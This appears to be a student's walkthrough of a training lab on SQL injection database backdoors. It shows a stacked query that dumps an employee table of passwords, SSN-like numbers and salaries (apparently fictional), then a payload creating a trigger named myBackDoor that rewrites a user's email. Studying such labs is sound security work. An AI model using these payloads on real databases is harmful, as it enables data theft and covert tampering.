Injection Flaws - Database backdoors
- input : 101 <<<< ID
Result :
User ID | Password | SSN | Salary | |
---|---|---|---|---|
101 | larry | 386-09-5451 | 55000 | larry@stooges.com |
- input : o
[select userid, password, ssn, salary, email from employee where userid=o]
^ ^
Column target Table target
- try to injection
Result :
User ID | Password | SSN | Salary | |
---|---|---|---|---|
101 | larry | 386-09-5451 | 55000 | larry@stooges.com |
102 | moe | 936-18-4524 | 140000 | moe@stooges.com |
103 | curly | 961-08-0047 | 50000 | curly@stooges.com |
104 | eric | 445-66-5565 | 13000 | eric@modelsrus.com |
105 | tom | 792-14-6364 | 80000 | tom@wb.com |
106 | jerry | 858-55-4452 | 70000 | jerry@wb.com |
107 | david | 439-20-9405 | 100000 | david@modelsrus.com |
108 | bruce | 707-95-9482 | 110000 | bruce@modelsrus.com |
109 | sean | 136-55-1046 | 130000 | sean@modelsrus.com |
110 | joanne | 789-54-2413 | 90000 | joanne@modelsrus.com |
111 | john | 129-69-4572 | 200000 | john@guns.com |
112 | socks | 111-111-1111 | 450000 | neville@modelsrus.com |
- Complete Injection
Stage 2: Use String SQL Injection to inject a backdoor or DB worm
Sql Injection Stetement105; CREATE TRIGGER myBackDoor
BEFORE INSERT ON employee
FOR EACH ROW BEGIN
UPDATE employee SET email='john@hackme.com'
WHERE userid = 105
Full SQL Statement Query
select userid, password, ssn, salary, email
from employee
where userid=105; CREATE TRIGGER myBackDoor
BEFORE INSERT ON employee
FOR EACH ROW BEGIN
UPDATE employee SET email='john@hackme.com'
WHERE userid = 105
result
User ID | Password | SSN | Salary | |
---|---|---|---|---|
105 | tom | 792-14-6364 | 99999 | tom@wb.com |
*Note* that nothing will actually be executed
because the current underlying DB doesn't support triggers.